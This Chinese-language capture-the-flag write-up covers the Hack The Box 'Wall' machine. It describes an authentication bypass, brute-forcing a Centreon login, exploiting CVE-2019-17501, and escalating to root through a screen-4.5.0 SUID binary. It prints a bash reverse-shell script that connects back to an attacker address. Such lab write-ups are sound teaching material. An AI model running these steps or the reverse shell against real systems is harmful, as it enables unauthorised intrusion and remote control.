前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Hack the box_Wall

Hack the box_Wall

作者头像
Khan安全团队
发布2020-03-10 21:38:56
6070
发布2020-03-10 21:38:56
举报
文章被收录于专栏:Khan安全团队Khan安全团队

大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Wall”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。

信息枚举

masscan扫描开放端口

nmap探测22,80端口的服务信息,发现被过滤了

利用gobuster扫描web

->gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.157

->/.hta (Status: 403)

->/.htpasswd (Status: 403)

->/.htaccess (Status: 403)

->/index.html (Status: 200)

->/monitoring (Status: 401)

->/server-status (Status: 403)

只有monitoring有点用,不过monitoring需要认证才能登录发现只要把访问方式改为POST就能绕过认证进去发现这是一个centreon系统(Centreon是一个网络,系统,应用程序监督和监视工具)登陆处有一个csrf令牌验证,每次访问都会更改

在官网中得知,我们访问/api/index.php?action=authenticate,并且提供登录登录信息,将可以绕过令牌校验,从而达到爆破目的

我们使用Seclist字典进行爆破密码为 password1

我们发现了系统版本为19.04.0

低权限shell

该系统存在CVE-2019-13024漏洞,不过当我使用poc尝试攻击时,发现poc用不了,payload有一个过滤处响应403 后来我发现了CVE-2019-17501,这个要简单一点在http://10.10.10.157/centreon/main.php?p=60807&o=a&type=4中写入bash并用SimpleHTTPServer上传自己的webshellwebshell如下

->#!/bin/bash

->bash -i >& /dev/tcp/10.10.xx.xx/xxxx 0>&1

再次写入bash命令获得反向连接shell

->bash /tmp/n00b.sh

并且获得TTY终端

权限提升

在使用自动化脚本枚举系统信息中发现系统中有一个不常见的suid二进制文件:

/bin/screen-4.5.0

使用poc获得root权限

最后我们得到了user.txt、root.txt

手握日月摘星辰,安全路上永不止步。

- Khan攻防安全实验室

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-12-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 信息枚举
  • 低权限shell
  • 权限提升
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档